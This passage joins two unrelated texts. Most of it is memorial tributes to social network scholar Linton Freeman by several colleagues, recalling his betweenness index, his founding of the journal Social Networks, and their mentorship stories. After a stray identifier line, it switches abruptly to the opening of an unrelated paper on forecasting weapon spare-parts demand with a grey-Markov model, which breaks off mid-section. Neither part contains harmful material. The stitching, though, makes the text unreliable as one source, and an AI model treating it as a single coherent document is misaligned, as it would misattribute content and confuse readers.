the legitimacy of SNA). At the same time, Lin and I were discussing computer subroutines and I ar- gued that it would be better to have special-purpose software targeted for substantively successful kinds of analysis versus generic software that did a little bit of everything (personal computers were smaller back in the day – my first network software for a personal computer ran on an Osborne). What I missed in my arguments was the important role that a journal and software would have in creating a sense of community. Outside a few people asso- ciated with prominent university centers, social net- work analysis was a fugitive enterprise in the 1970s. I, like so many others, felt that we were on the outside looking in. And I, like so many others, found intellec- tual community around Lin Freeman. It was a per- fect example of an invisible college network – people connected indirectly through their strong admiration for a central figure. Perhaps Lin had a such a good feel for young fugitive scholars perhaps because he had spent much of his own career on the edge of the mainstream. This is what I meant by Lin finding his time. At the same time that Lin brought community to social network analysis, SNA gave Lin a community to lead. To my mind, there is currently no scholar in SNA with Lin’s generous charisma, but it is also true that SNA is no longer the fugitive enterprise it was, in need of the charisma Lin brought to us. It would be difficult for a guru to pull together today the commu- nity that Lin successfully created back in the day. Lin and SNA met at a time when each was a blessing to the other. The second of Lin’s qualities that stays with me is his scientific elegance. He had a taste for simple, rep- licable prediction. He admired it in others, and took me to task when he (often) found it absent in my work. Discussing explanations with Lin took me back to my undergraduate courses in the natural sciences. The touchstone work to which I often return is Lin’s initial proposal for his “betweenness” index (about half of the 42 thousand Google cites to Lin’s work are to his betweenness index – which indicates the importance of his index at the same time that it indicates Lin is equally recognized for diverse works other than his index). In a 1977 issue of the American Sociological Association’s social network journal, Sociometry, Lin proposed a measure of the extent to which a person brokers connections between others (i.e., stands “be- tween” others). The proposal is simple, elegant, but 9 CONNECTIONS (INSNA) Lin goes on to show how his proposed index does a more consistent job of predicting in a classic study the key outcome for which a more familiar measure had been used (picture of Steve Borgatti). One would like to believe that routine practice involves simple argument combined with evidence of improved key prediction in comparison to prior measures. It is not routine. It is rare. Most network measures are pro- posed in complicated text, with no more empirical ev- idence than numerical illustration of how to compute the measure. Lin’s (1977) proposal is an exemplar to which I return from time to time when in need of an aspirational goal. I learned of Lin’s death when his daughter, Sta- cey, responded to an email message I sent to Lin asking about a convenient time to visit. Upon hearing the news, I stopped what I was doing and stared at my desk for a long while, my world a darker, colder place. He will forever walk with me a silent partner – likely telling me I could do better. A tribute to Lin Freeman Pat Doreian When thinking about Lin, my thoughts follow three distinct but interlinked strands. The first centers on friendship. The second features issues related to the social organi- zation of research fields. The third strand concentrates on doing network research. I write about all three in this order while thinking about Lin and his many contribu- tions to my life, the nature of the social networks field, and the brilliance of his academic contributions. Friendship On a personal level, having Lin as a close and great friend for such a long time enriched my life immense- ly. When Lin formed friendships, he remained com- mitted to these relationships and provided constant support. I am sure many others have experienced this as well. But in writing about Lin as a friend, it is impossi- ble to not fully include Sue Freeman. Together, they formed a fine couple living a rich and full life. Togeth- er, they provided a kind of role model worthy of em- ulation. Esther and I rented apartments with them in Paris on multiple occasions as well as a house on Oahu in Lin’s beloved Hawaii. These were times of immense fun involving discussions about life – both social and regarding research issues, the places where we were, good food and fine wine. When Lin did things, he went ‘all in’ when doing them. It did not matter if this was downhill skiing, wind surfing, or cooking. He excelled in all three – as well as in doing coherent and influential research. Lin did not care much about dealing with finances or real estate, tasks Sue handled with aplomb. They had a nice division of labor in organizing their lives. Both were forceful individuals. As noted by others, Lin had firm views and held them with passion. He could change his mind on an issue and hold firm to an op- posing view with equal vehemence. Yet he would ar- gue his side with humor and grace. He could listen to other views without wanting to be dominant. Despite his many accomplishments, I never saw any effort at self-aggrandizement on his part. Social organization of the social network field Others have noted that he founded Social Networks, the premier journal of the field, and edited it for a very long time. He had a clear vision for the role this jour- nal could play as a venue for publishing important work and how it could help to define our field. Espe- cially important was the breadth of his commitment to encouraging interdisciplinary work across multi- ple fields. Disciplinary departments tend to be insu- lar turf-protecting machines designed to keep within narrow definitions and strong exclusives impulses. Lin would have none of this. Put differently, he was catholic in encouraging multiple approaches and dif- ferent ways of doing research so long as it was rigor- ously defined within sound research designs. Both Lin and Sue were socially active at the annual Sunbelt Social Network conferences both in sessions and, more importantly, outside sessions when a lot of ideas are generated in free-flowing discussions about our field and potential future directions. I look back fondly at Lin ‘holding court’ as these Sunbelt gath- erings, especially as they grew larger. He would sit in some public area. Others would be drawn to talk with him, learn from him, and enjoy his company. His creation of the NSF Funded Electronic Infor- mation Exchange System (EIES) experiment with a gathering of researchers also helped define the emerging field. Currently, we take for granted the free flow of information on the Internet. But this experi- ment was in the early days of this form of commu- nication. Even though we exchanged messages at an incredibly slow baud rate, we had a sense of the 10 A collection of tributes to Linton C. Freeman future thanks to another aspect of Lin’s vision of what could be done. Lin’s contributions to the social network literature My idiosyncratic career path from mathematics to social science in England meant that my entry into the social network field had nothing to do with Lin! Indeed, in the late 1960s I had not even heard of him. I was busy trying to generalize many of the theorems characteristic of the early work done at the University of Michigan and associated with the work of Frank Harary and Doc Cartwright, among others. I did not meet Lin until the EIES gathering mentioned above. In many ways, I wished I had met him earlier. Without doubt, some of his most influential, and highly cited, work dealt with centrality. Others are bet- ter placed to comment further about his contributions in this realm. I was struck particularly by the clarity of his articulation of some different conceptions and for- mulations of this concept. Until he brought such clar- ity, the concept had been rather fuzzy and was used sloppily. He was clear about the substantive mean- ing of these different concepts and the importance of selecting the one most appropriate measure given a specific research endeavor. I am sure that he would be appalled by the impulse of so many to compute a lot of centrality measures without thinking through the rationales for using them. Here, I will focus on only two productions involv- ing Lin. Early on, Norm Hummon and I were develop- ing methods for citation networks that have become known within the rubric of ‘main path’ analysis. Lin had collected the citation network for 20 years of the centrality literature. With characteristic generosity, he gave us his data. We analyzed them and sent him a draft of a manuscript. He wrote a paragraph that led him to becoming a co-author. It was a (positively) so- bering experience for us. We had some neat results, but he transformed them with a deeper understand- ing of the broader context of this area. He turned a good paper into a very good paper and, critically, forced us to broaden our perspective. It was one of the most valuable lessons he taught us. No doubt, students fortunate enough to have had Lin as one of their faculty members will have experienced many such learning experiences. The next study featuring Lin and Sue was about informant accuracy (or inaccuracy) developed by Russ Bernard, Peter Killworth, and, later, Lee Sailer. By questioning the quality of the typically collected network data, this line of research rattled many cag- es. While some responded with irritation or a sense of foreboding about collected social network data, Lin responded in a typically deeper fashion. The design of Lin and Sue’s study was pure elegance. Attend- ance data for a long running seminar at Irvine were collected. Following one session, with a time lapse, the participants were asked about who was there. Of course, there were errors in the form of forget- ting some who were there and claims that some not attending on that occasion were there. By consid- ering the social organization of the seminar and the programs from participants came, both types of er- ror could be accounted for. It was another example of considering a broader context to understand the operation of social processes to generate deeper un- derstandings of social life. On the future My stating that I will miss Lin and Sue greatly counts as a total understatement. No doubt others will share this sentiment. The creation of the set of tributes in this volume testifies to this. The nature of our field was shaped indelibly by Lin, in terms of his clear vi- sion as to what was possible for doing social network research, his ability to organize events critically im- portant for our field, and the great support he gave to so many of us. We must continue to do quality re- search for this is the only way forward for our field. Perhaps more importantly, this work will be inspired by his acumen and a sense of standing on the shoul- ders of Lin as a giant in the field. Lin Freeman is science Elisa Bienenstock In my mind and memory, Lin Freeman is Science. When I think of Lin, I think of the scientific method. Not because I took Research Methods from Lin, I did not. For me, Lin personified the promise of science. My contact with Lin was sporadic. When I met with him some things were constant, and others were not. There was a persistence of curiosity, energy, humor, kindness and generosity. What differed were the the- ories he passionately espoused about the way the world worked. At any point in time Lin enthusiastically and emphatically would argue in support of a position on one or another topic (from coffee to methods), and then a short time later, I would find he had abandoned or updated that view. New data, new evidence, new measurement demanded an update. Lin easily es- chewed that which “was not supported” by reason and data and revised his theory. Lin had no conventional 11 CONNECTIONS (INSNA) biases. He did not presume based on sex, race or any other “sociological” variable associated with personal characteristics. Lin evaluated everything and everyone based on the data presented to him. Not constrained in his search for knowledge, Lin would seek out any data and master any method to answer a question or solve a puzzle that enticed him. This made Lin the ide- al teacher, researcher and mentor. It was obvious that for Lin science was not a vocation. Lin lived, loved and embodied science. Thoughts of Lin evoke thoughts of the beauty and promise of science done right. For me, when I think “science,” I see Lin. Freeman dependency and distance Ulrik Brandes Lin Freeman was, quite liter- ally, a towering figure. While others are infinitely more qualified to give personal accounts of their interac- tions with him, for me he symbolizes my relationship with the social sciences. I was trained as a com- puter scientist and special- ized in algorithmics. As a doctoral student in the 1990s, I regarded the social sciences in general, and Lin’s contributions to the pe- culiar science of social networks in particular, as highly interesting but only mildly impressive. In the absence of deep mathematical concepts and challenging proofs, it seemed that a bit of extra reading and learning a few names and ideas would suffice to be able to contribute to the field of social networks like the pros. Little did I know. In Michael Ende’s children’s book Jim Button and Luke the Engine Driver, a Mr. Tur Tur appears as a giant from afar and the closer you get the more he shrinks to what eventually is a rather normal person. The opposite was the case with Lin and his work: to the contrary and to this day, he has grown bigger and bigger the closer I got to grasping where the issues even started. Lin, I have come to realize, had thought through many of these issues, albeit decades ago. His appro- priation of mathematics was often ahead of its time, however, so that we have yet to give birth to ideas that in retrospect will turn out to be conceived already in his work. In a last article he saw published in the journal he founded and shaped, we, with Steve Borgatti, picked up on one such idea from a quarter of a century ago. While the associated 1980 paper has been cited fair- ly, I dare say rarely for its most important aspects, in- cluding by myself. Two concepts involved in this work, an asymmetric dyadic relationship indicating the de- gree to which an actor depends on another to reach the rest of the network, and a closely related notion of distance in terms of the average number of intermedi- aries on shortest paths (think weighted networks!) are essential in linking two of the most important central- ity indices, betweenness, (which Lin introduced) and closeness (for which he gave crucially distinct inter- pretations in terms of efficiency and independence). Our conversations were confined to Sunbelt and email but I will remember him as having an aura of unassuming depth and open-minded firmness. His approach to interdisciplinarity was not one of lectur- ing about the things he knew better. His rigor was of a different kind than is known to those trained in the exact sciences. It is thus easily underappreciated, and yet so much more convincing and inspiring when you admit of it. I will be grateful for the example he set, and my way to honor him will be to refer to the relations men- tioned above as Freeman dependency and Freeman distance. Thoughts on the passing of Linton Freeman David Krackhardt Perhaps no one is more responsible for me pursuing a career in studying social net- works than Lin Free- man. The story of how I took up the challenge to use network analysis to study organizations is a bit strange, but ex- emplifies Lin’s role in many of our lives. He was a true intellectu- al, one who thrived on discourse, even argu- ment, but with serious curiosity and respect. He didn’t suffer fools lightly, but he did engage, even when you might disagree with him. My background was organ- izational psychology; his interests lay in sociological explanations. My training emphasized applications, de- riving practical solutions to managerial problems. He preferred science for its own sake. He often told me that social science was not mature enough for us to be 12 A collection of tributes to Linton C. Freeman making sound judgments or conclusions about com- plex organizational problems. Social scientists should spend our efforts, he would say, focusing on sound and basic research into fundamental human behavior questions. Applications were better left to consultants or other pretenders. Despite these differences in per- spectives, he seemed to enjoy my company and our conversations about such issues. He never insisted that I adopt his view on these partisan topics; rather he seemed to thrive on the discussions because of these differences. I always felt respect from him, even liking, in spite of views that diverged from his, and despite the fact that I was clearly a kid just beginning in my chosen field and he was an established, eminent scholar in his. His support and guidance were key to my converting from a student of job attitudes to the study of social structure in organizations. My conversion was not gradual, but almost Road to Damascus-like, and it is due to both his kindness and intellectual enthusiasm. The particulars are re- vealing about Lin as a scholar and as an inspirational leader in the field. By 1980, I had spent four years in a PhD program as a research assistant to Lyman Porter, a renowned organizational psychologist who published regularly in the most prestigious APA jour- nals. My dissertation proposal, fully supported and accepted by my committee, was to study attitude changes in junior auditors as they joined and were absorbed into one of the large professional auditing firms in Southern California. There were eight big au- diting firms in the area I could choose from to study. One by one, however, they turned me down, until only Arthur Anderson was left. My contact at Arthur An- derson, a senior partner at the local office, was en- thusiastic about my proposed study, saying that the firm could gain important insights into how they bring along young employees into the AA professional fold. I called my contact at Arthur Anderson to tell him that he was the winner that I had decided to go with their offer to study them. He then gave me the calamitous news: “David, our lawyers won’t let you come near our firm or our new employees to study them. Appar- ently, there is too much liability assumed by the firm with such an arrangement.” I was devastated. My ca- reer plans, all my aspirations, my whole life went out the window with that phone call. The Graduate School of Management at Irvine, where I was a student, occupied the 3rd floor of So- cial Science Tower. The top floors, floors 4-7, con- tained the School of Social Sciences, which in those days was an interdisciplinary array of scholars with no departmental structure or affiliations. Having just got off the phone with Arthur Anderson, I was in a sorry, depressed state. I entered the building on the ground floor, walked into the elevator, not sure what I was go- ing to tell Porter, my advisor. For some reason, one that I cannot begin to recall, I failed to push the 3rd floor button on the elevator and instead pushed the button for the 7th floor. I don’t recall doing that; all I recall is that when I stepped off the elevator I was in unfamiliar surroundings, wondering where I was. No one was on the floor, except a tall gentleman with shocking-white hair, wearing sandals and a flowery short-sleeved shirt (it was January). He looked at me, probably noticing that I was lost and confused, and said kindly, “Can I help you?” I had never met him be- fore, but I recognized him from pictures I had seen. He was the Dean of Social Sciences, Linton Freeman. I was embarrassed. I didn’t know what to say in response to his question. I couldn’t just tell him, “Oh, I’m sorry, I pushed the wrong button on the eleva- tor. I meant to go to the third floor.” So, instead, I just made something up on the spot. I said, “Oh, I came to see you. Someone told me I’d be interested in your research.” An avuncular smile came over him, and he invited me into his office (corner office, with a great view). He spent the next one and a half hours telling me stories about network analysis and how this per- spective is different than the one I was likely to have on social phenomena (he was right about that). At the end of that session, he suggested that I sit in on a PhD and faculty seminar he and Doug White were running together. He also mentioned that Harrison White would be sitting in on the seminar, too. I had no idea who any of these people were, but I certainly had nothing better to do, so I decided to take him up on his offer. At the first day of the seminar, Lin handed me a type-written carbon copy of a book manuscript. There was a magical twinkle in his eye when he said, “Here, you’re an organizations person. This is a book written by a young sociologist who studies networks and organizations. Your job is to read this manuscript and tell us what it says.” When you have to explain the contents of a new book to a room full of experts, you read the book very carefully. It was Ron Burt’s first book, Toward a Structural Theory of Action. Chapter 2 contained a succinct yet detailed history of various constructs in the field of social networks. Chapter 5 emphasized the importance of perceptions of networks. Light bulbs went off as I read it. Page af- ter page, I could see these ideas could be very useful in the field of organizational behavior. Indeed, I came to see that almost everything we study in OB could be looked at anew through this network lens. More- over, there were questions that we had never even thought about asking that could be researched from this network perspective, questions that would give 13 CONNECTIONS (INSNA) us new insights into the organizational phenomena that we care about in our overtly psychological field. I abandoned my old dissertation plans and developed a new proposal to study the effect of employee turn- over on attitude change in fast food restaurants as a function of the network structure in the restaurant. I’ve been doing social network studies in organiza- tions ever since. All because I pushed the wrong but- ton on the elevator. It has been nearly 40 years, but I recall vividly many of the details in this story, especially Lin’s words and that “magical twinkle” in his eye when he handed me Ron’s book. Did he know that this book would have such an effect on me and my career plans? I don’t know. What I do know is that he never stopped engaging me, inspiring me, comforting me in rocky times over the years. I will miss him, his challenges to my way of thinking, his support, his friendship. Intellectual lineage: A grandson and a son reminisce John Skvoretz and Tom Fararo A remembrance of Linton Clarke Freeman in which, first, the grandson, John Skvoretz, narrates how he came to be Lin’s intellectual grandson and then the son, Tom Fararo, reminisces more expan- sively about Lin’s deep influence on his life and career. The first time I met Lin turned out to be extremely consequential for me, resulting in my becoming his intellectual grandson. I was a senior at Lehigh Uni- versity double majoring in Mathematics and Sociol- ogy. At the time the two disciplines were but vaguely linked in my mind. I liked math because its problems had answers in the back of the book and I like sociol- ogy because its problems had no answers anywhere in the book. That the two could be put together in something called mathematical sociology was as yet unknown to me. The occasion of Lin’s visit was a colloquium. I think he was invited by James McIntosh, a former colleague at Syracuse, and it may have been the ini- tial overture to his recruitment as chair of the Lehigh department of Social Relations. In any event the talk he gave had as its theme how mathematics could be used to improve concepts and theories in sociology. The example I remember most vividly was based on residential segregation. Lin proposed a method of measuring residential segregation that compared the observed boundary around a set of minority house- holds to the length of the boundary that would oc- cur by chance, that is by the random scattering of m minority households and M majority households over a stylized housing grid. The mathematics came in to calculate the expected length of the boundary and variation in that quantity due to chance. As I re- call what struck me the most was Lin’s point that this approach not only served to measure segregation as commonly understood – when the observed bound- ary was significantly smaller than expected – but also its polar opposite, regimented integration, when the boundary was significantly larger than expected. So with a fired-up imagination I hung around af- ter the talk and spoke with Lin, telling him about my background and my interests. He advised me to check out a young professor, Tom Fararo, at the Uni- versity of Pittsburgh to see about working with him for my graduate education. At the time I did not re- alize that Lin was Tom’s dissertation supervisor. So a friend and I took a day off and hitchhiked across Pennsylvania on the PA Turnpike, he to visit the Phys- ics Department at Pitt and me to visit Tom. Well, long story short, I enrolled at Pitt in 1969 and finished a dissertation under Tom’s supervision seven years lat- er. And that is how in 1976 I became one of Lin Free- man’s intellectual grandchildren. And now the son, Tom Fararo, shares his memo- ries. I first met Lin in 1960. He was 33, an Assistant Professor in the Department of Sociology at Syra- cuse University. I was 27, a graduate student at Syra- cuse in a program leading to a degree called Doctor of Social Science. Unlike Lin and John, I had not been an undergrad- uate major in sociology but in history and political sci- ence, with no background at all in research methods and statistics. Nevertheless, looking for income in the upcoming summer of 1960, I applied to be an assistant on a research project dealing with community power structure, a lively topic in both political science and soci- ology at that time. I was hired by Lin – after a very pleas- ant interview – and worked closely with him not only that summer but for a number of years beyond that. 14 A collection of tributes to Linton C. Freeman Working with Lin was a transformative experience. I had brought to the project an interest in the history and philosophy of science but now I was doing sci- ence. By mid-summer, Lin made me an offer: switch to the sociology graduate program and continue to work with him as a research assistant. It was an easy decision to make and one that shaped the remainder of my academic life. In the following academic years 1960-62, Lin taught a number of courses I attended. As a teach- er, he was a model of logical organization and clarity. About that time, he began work toward his book El- ementary Applied Statistics: For Students in Behav- ioral Science. I believe I read and commented on a draft and years later, when I stepped in to replace the usual teacher of statistics at Pitt, I adopted Lin’s text. It was the only time I ever taught statistics during my career. It was a very gratifying experience both for me and for the students, thanks to the sophisticated and lucid way that Lin presented the material. Following his advice, I looked beyond the depart- ment of sociology for further research-relevant course work, in particular taking courses in the psychology department, including social psychology and some quantitative courses, in particular factor analysis be- cause Lin had figured out a way for us to use it in the data analysis phase of the project. I also attended Lin’s course on the use of computers in social sci- ence research. He and I spent many hours at the uni- versity computer center watching the flashing lights on an IBM 650, a bulky early desktop computer. Eventually, as we concluded the data analysis, Lin asked me to write a first draft of a paper to be sub- mitted to the American Sociological Review. It was quite an honor! I gave it my best and waited for his reaction. Ouch! What happened to my draft? He had produced a completely new paper in his distinctive crisp style that covered all that was needed to receive strong referee reviews that led to publication in ASR in 1963, “Locating Leaders in Local Communities: A Comparison of Some Alternative Approaches.” Nat- urally I was very pleased when he included me as a co-author, but all the credit goes to Lin when I men- tion that the paper was quickly reprinted in at least seven compilations of papers in political sociology. The last that I know of appeared in 1971. Eventually I had to define and pursue a doctoral thesis project. There was an opportunity to draw upon the community power structure data and so to deal with a problem we had faced at the data analysis phase. Namely, a great deal of our data was simi- lar to sociometric data and yet more complex. Much of the analysis was done using factor analysis, later described in Lin’s 1968 monograph Patterns of Local Community Leadership. At about that time, in late 1961, Anatol Rapoport and William Horvath published their pioneering paper “A Study of a Large Sociogram” in Behavioral Sci- ence. In his 2004 book, The Development of Social Network Analysis: A Study in the Sociology of Sci- ence, Lin includes a short discussion of the Syracuse project, nicely summarizing how it emerged (pp. 111- 112). I think he is correct when he writes there that he “leaned on” me to use the Rapoport model in my dissertation research. Accordingly, during the summer of 1962, after studying Rapoport’s papers in the Bulletin of Mathe- matical Biophysics, I wrote to him about my disserta- tion project (I can’t recall if I consulted Lin before do- ing so, but it is likely that I did). Rapoport shared with me some of his recent work, including a revision of the biased net model that he and Horvath had con- structed in their study. The term “net” was used in the Bulletin papers and “bias” referred to parameters that were proposed to explain departures from a random net model. The Syracuse interviews had generated an enor- mous amount of relational data, but it was organized around participation in 39 community decisions. My dissertation, therefore, had to be a compromise: I would apply a biased net model to the largest of these decision sociograms even though they were nowhere near as large as the sociogram analyzed by Rapoport and Horvath. Nevertheless, Rapoport encouraged me to go forward with the project, as did Lin. When I presented Lin with what I thought would be the first draft of the thesis, I expected to get back a manuscript with his critical remarks and questions throughout. I even wondered if he might suggest a complete revision. A week later, I was standing before him as he sat at his desk when he returned the man- uscript to me. I looked through it: no markings at all. “That’s it?” I recall asking with some trepidation as to what this meant. He gave me that big grin I remem- ber so well and chuckled. “Defend it,” he said, enjoy- ing my own overwhelmed surprise. And I did. There is an acknowledgment statement in the Preface to my dissertation that reads: “Anatol Rapoport provided me with the revised theory of biased nets before its publication. More than that, he encouraged me to proceed with this study and provided invaluable advice. Indeed, in the ab- sence of personal correspondence with Anatol Rap- oport, this whole study would have collapsed. I owe him an intellectual debt of great magnitude, not only because of the theory and the correspondence, but 15 CONNECTIONS (INSNA) because through his writings I caught a glimpse of what Rapoport once called ‘disciplined imagination.’’’ But I didn’t forget the formative role that Lin played. In that Preface I also thanked Lin for his “personal reinforcement, support, and teaching […]. It was he who taught me that if I were really in- terested in theory, then I had better get interested in mathematics. More than making it plausible, he made it possible by setting an example and by encouraging me to go forward with this particular research effort.” In 1973, I wrote in the Preface to my book Mathe- matical Sociology: “It is a pleasure to acknowledge the influence of Linton Freeman in shaping my sociological incli- nations. As my mentor during my graduate student days, he was an important source of my commitment to exact methods in social theory. My ideas about mathematical social science were formed and trans- formed under diverse influences. To name but a few [….] [here I mentioned Rapoport, as well as philoso- phers Patrick Suppes and Stephen Toulmin, among others including sociologists Jim Coleman and Har- rison White].” However, I made an error of judgment in not ask- ing Lin to read a draft of that book. In retrospect, I think he would have suggested that I omit cer- tain materials not only to shorten the book but also to make space for the coverage of the Rapoport- Horvath model and my own later follow-up publica- tion (mentioned below). This is a negative instance of my theme: not drawing upon my connection to Lin led to a less positive outcome than would have oc- curred with his advice. By the way, the insightful and influential paper by Granovetter (“The Strength of Weak Ties”) appeared in AJS that year (1973) but too late for me to know about when my book went to press. It also drew upon the Rapoport-Horvath paper. Lin also created numerous intellectual opportunities for me during my graduate student days at Syracuse. In the early years, all my support came from fellowships and research activity. Then Lin suggested that I do some teaching and spoke with the chairperson about it. Despite his relatively junior rank, on this occasion and many others it was apparent to me that Lin had considerable influence within the department. He was able to persuade the department’s senior members, including the chairperson, that I should be assigned certain specific courses of my own even though I had not even had any experience as a teaching assistant. Thus, my earliest teaching focused on theory: an undergraduate course in sociological theory and an- other course for sociology majors called “the integra- tion seminar.” In the theory course, one of the texts I had students read was Games, Fights and Debates by Anatol Rapoport and in the integration seminar one of the texts was the newly published Types of Formalization by Joe Berger and co-authors. Both books were indicative of new developments in social science centering on formal models. Lin was among the sociologists who recognized the importance of this frontier work in the social sciences. I recall that in one of Lin’s courses he lec- tured on elementary set theory, finite probability the- ory and elementary matrix algebra. These mathemat- ical ideas were the key ingredients that were pulled together by John Kemeny in his innovative textbooks with co-author Laurie Snell, starting with An Introduc- tion to Finite Mathematics, which I believe was first published in 1957. Lin also drew upon his professional acquaintance network to open up career opportunities for me, in- cluding getting invitations to give talks, applying for and receiving funding for research, and another important act on his part, writing a strong recommendation re- garding my application for a post-doctoral fellowship. I’ll try to recall a little of each of these efforts on his part that helped to shape my career in sociology. I think it was late in 1962 that Jim Coleman invit- ed me to give a seminar on my dissertation work. He was at Johns Hopkins at the time and interested in Rapoport’s work. Indeed, he had written an exten- sive essay on it that appeared in 1960 in Mathemat- ical Thinking in the Measurement of Behavior (edited by Herbert Solomon). This little-cited essay should be recognized as part of the history of social network analysis. There was a similar invitation from Peter Rossi to talk about my thesis work at the University of Chicago. At about the same time, I received an offer to re- main at Syracuse as an assistant professor starting in the academic year 1963-64. Perhaps this was an- other example of Lin’s behind-the-scenes influence. However, I surmise that he must have been ambiva- lent about it. I know he suggested that I wait to take the best offer, which would be from Johns Hopkins or Chicago, should either or both actually make an of- fer. However, the Syracuse chairperson pressed me to decide while Coleman and Rossi both indicated that it was too early for them to decide among can- didates. Thus, I accepted the position at Syracuse. Maybe I should add that I had a wife and two very young children so that prospective financial security was a factor in the decision. Once it was clear that I would be a Syracuse fac- ulty member in the academic year 1963-64, I began to think about getting support for a research project I had in mind. My prospective collaborator (Morris 16 A collection of tributes to Linton C. Freeman Sunshine) and I applied for support for a study that would relate to the theory of differential association that was often cited at that time in regard to the ex- planation of juvenile delinquency. We planned to do a sociometric study of an entire local junior high school student population. Lin was instrumental in speaking on our behalf to the director of the Syracuse Univer- sity Youth Development Center. I think we each re- ceived an appointment as research associate at the Center as well as support for conducting the study. From my point of view, the Center’s support ena- bled a study of a large network and so a better fol- low-up to the Rapoport-Horvath paper than my disser- tation had been. At its conclusion, our research project led to a monograph on random and biased net theory and the empirical testing of a biased net model. A link to differential association theory also was included. Sunshine and I called it A Study of a Biased Friend- ship Net. In the course of the formal work, I found a problem in Rapoport’s most recent “tracing formula” that led me to devise and use a new formula. Ironically, years later, John Skvoretz found a problem in my for- mula, leading him to a series of formal and computa- tional studies in the theory of random and biased nets. Gradually, amidst this teaching and research, I realized that the direction my academic activity was taking would require more than finite mathematics. I applied for a three-year post-doctoral fellowship for studies in pure mathematics and mathematical mod- els in the social sciences at Stanford University. There is no doubt in my mind that Lin’s recommendation strongly contributed to my getting the fellowship. Thus, there was a match between what I wanted to do and what funding agencies were ready to support during that era. And what I wanted to do was at least in part the outcome of my extended interaction with Lin since I first met him in 1960. Toward the end of that three-year period at Stan- ford, I think Lin was ready to leave Syracuse. We had remained in contact and he had stopped by to visit my wife and I in Palo Alto at least once. His proposal was that we form a research group at the University of Pittsburgh that would engage in teach- ing and research on the new intellectual frontier. This idea probably was sparked by an opportunity that existed at Pitt at that time. Namely, funds were made available by the university administration for departments that had a “vision” for what they could become in terms of stature. The sociology depart- ment chairperson at the time, Burkart Holzner, came up with a vision that was quite ambitious, involving hiring three research groups, each on the frontier of new developments in the field. I only recall two of these: historical sociology and what he called formal sociology. Although not a formalist in his own work, Holzner had taken note of the new developments that I mentioned earlier. Thus, in 1967, Lin and I both joined the department, as did Otomar Bartos, who had just published a very nice textbook called Sim- ple Models of Group Behavior (One chapter deals with a dominance model, right out of the Bulletin of Mathematical Biophysics). I wish I could say it all worked out beautifully. But it didn’t. Maybe it was the late 1960s turmoil. I don’t know. Bartos left very soon. And Lin spent only two years at Pitt before moving on in 1969, the same year that John Skvoretz arrived to join the graduate pro- gram – through Lin’s influence. I remained at Pitt for my entire career and John would eventually become my frequent collaborator. Farewell to Lin Freeman, my mentor and more! Social scientist extraordinaire! work_zgex2teysbcjjhnn7t4oyvqu5q ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-027 47 Demand Forecast of Weapon Equipment Spare Parts Based on Improved Gray-Markov Model Li Ou School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 18792584953@163.com Liu Bailin School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 498194312@qq.com Li Chenhao School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 894708601@qq.com Gao Dan School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 1366935590@qq.com Abstract—The demand for spare parts of weapons and equipment is time-varying and random. It is difficult to predict the demand for spare parts. Therefore, on the basis of gray GM(1,1), a state transition probability matrix based on improved state division is used to establish a demand forecast model for weapon equipment and spare parts. The model not only considers the characteristics of the GM(1,1) model's strong handling of monotonic sequences, but also extracts the characteristics of random fluctuation response of data through the transformation of the state transition probability matrix, avoiding the phenomenon of the worst prediction results when the maximum probability state is not the actual state. It is proved through experiments that the prediction result based on the improved gray-Markov model is superior to the traditional model and the classic gray-Markov prediction model, and the accuracy of the improved model is about 1.46 times higher than that of the gray model. Keywords-Grey Theory; Markov Model; Spare Parts Forecast I. INTRODUCTION Weaponry is composed of many parts, and these parts need to be repaired and replaced during use. In order to shorten the short interval between the repairs of weaponry and equipment, increase normal working hours, reserve a reasonable number of spare parts for replacement at any time. Weaponry spare parts are effective measures to improve the availability of weaponry and equipment, reduce life cycle costs, and ensure the effectiveness of combat effectiveness on time [1]. In the issue of spare parts support, the prediction of spare parts demand is an important means to promote "precision support", and is also one of the key and difficult points in the research of equipment comprehensive support. There are many reasons for the occurrence of spare parts demand. In addition to the reliability rules of weapons and equipment itself, the use of equipment, repair strategies and maintenance methods will affect the number and time of spare parts demand. Spare parts demand shows randomness and fluctuation Therefore, equipment managers urgently need to find a method to predict the random demand for repair spare parts. At present, there are many technologies for demand planning, forecasting and decision-making, mainly including time series forecasting models, regression analysis methods, support vector machines, neural networks, gray forecasting and decision making, Markov forecasting, Combined optimization decision- making, and their Between each other. Among them, the method based on the time series prediction model requires a large amount of historical data, and the data must not have periodic changes or mutations. Neural network-based spare parts demand prediction method requires a large number of statistical samples, and the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 48 prediction results are highly subjective and random. These factors greatly limit the application of artificial intelligence methods [2]. Therefore, how to improve the prediction accuracy of the demand for spare parts for weapons and equipment is an important link for effectively guaranteeing the supply of spare parts for our military equipment. The gray prediction model is suitable for solving the problems of small samples, poor information and uncertainty. It has less calculation and is convenient and practical. It has a good prediction effect for short- term prediction, but it has a poor fit for long-term prediction and volatile data series. The Markov theory describes the influence of random factors and the internal laws of transition between states through the state transition probability, which can effectively make up for the deficiencies of the gray model [3]. To this end, this paper proposes to predict the demand for spare parts for weapons and equipment based on an improved gray Markov model, in order to effectively improve the prediction accuracy of random volatility data and broaden the application range of gray theory. II. RESEARCH STATUS OF SPARE PARTS DEMAND MANAGEMENT With the development and progress of economic globalization and science and technology, people have higher requirements for product quality and production efficiency, and there are more and more complex equipment in industrial production. In the process of using complex equipment, failures will inevitably occur due to factors such as maintenance damage, wear, corrosion, and expiration of life. In order to restore the normal operation of the equipment in time, minimize the economic loss caused by equipment failure or shutdown. [4] Companies generally purchase and store a certain number of accessories in advance, which are called spare parts. Spare parts, as support materials for the daily maintenance and emergency handling of equipment, are an important factor in ensuring the normal operation of complex equipment. Accurate and timely spare parts supply can ensure the continuity of production operations of the enterprise. Spare parts are an important material basis for equipment support work. Spare parts management Work has become an important part of equipment support work. Spare parts planning is affected by spare parts demand, so an effective spare parts demand forecasting model will provide an important basis for spare parts management decision making, and it is also the basis for quickly responding to changes in customer needs and improving corporate service levels. The demand for spare parts is very special. In most cases, the demand for spare parts occurs in uncertain and irregular time intervals, and the quantity is also unstable and changeable. Strictly speaking, demand is usually divided into: slow-moving spare parts, intermittent demand spare parts. The consumption of spare parts is extremely special. 